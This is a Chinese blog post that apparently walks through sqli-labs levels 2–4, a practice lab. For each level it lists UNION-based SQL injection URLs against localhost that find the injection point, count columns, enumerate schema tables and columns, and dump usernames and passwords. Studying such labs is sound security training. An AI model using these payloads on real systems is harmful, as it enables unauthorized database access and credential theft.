码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs-master 第二关+第三关+第四关

时间:2020-05-07 01:03:10      阅读:94      评论:0      收藏:0      [点我收藏+]

标签:code   sel   sele   用户名   匹配   取数据   显示   oca   security   

sqli-labs-master 第二关+第三关+第四关

实验2

1. 判断注入点
http://localhost/sql/Less-2/?id=1
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到数字里
2. 判断ID类型
http://localhost/sql/Less-2/?id=0 and 1 = 1
显示正常,我们可以知道ID类型是数字类型
3. 猜测匹配列数
http://localhost/sql/Less-1/?id=0 UNION SELECT 1,2,3 %23
匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-2/?id=0 UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-2/?id=0 UNION SELECT 1,username, password from users limit 5,1 %23

实验3

1. 判断注入点
http://localhost/sql/Less-3/?id=1‘) %23
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到(‘中
2. 判断ID类型
http://localhost/sql/Less-3/?id=0‘) and (‘1‘)=1%23
3. 猜测匹配列数
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,2,3  %23
匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-3/?id=0‘)  UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-3/?id=0‘) UNION SELECT 1,username, password from users limit 5,1 %23

实验4

1. 判断注入点
http://localhost/sql/Less-4/?id=1"%23
加入‘报错提醒,知道数据库的类型,根据报错信息,我们可以知道输入参数的内容被存放到("中
2. 判断ID类型
http://localhost/sql/Less-4/?id=0") and ("1")=1%23
3. 猜测匹配列数
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,2,3  %23
匹配成功,我们知道列数是3
4. 获取数据库信息
通过查询我们知道数据库名和管理员用户名
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,database(), user() %23
5.猜测表名
通过查询我们知道了用户表名为users
http://localhost/sql/Less-4/?id=0") UNION SELECT 1, database(), table_name FROM INFORMATION_SCHEMA.Tables WHERE Table_schema = ‘security‘ limit 3,1 %23
6.查找我们想知道的列
http://localhost/sql/Less-4/?id=0")  UNION SELECT 1, database(), column_name FROM INFORMATION_SCHEMA.Columns WHERE Table_Schema = ‘security‘ And Table_Name = ‘users‘ limit 0,1 %23
7.爆库
http://localhost/sql/Less-4/?id=0") UNION SELECT 1,username, password from users limit 5,1 %23

sqli-labs-master 第二关+第三关+第四关

标签:code   sel   sele   用户名   匹配   取数据   显示   oca   security   

原文地址:https://www.cnblogs.com/isChenJY/p/12840102.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!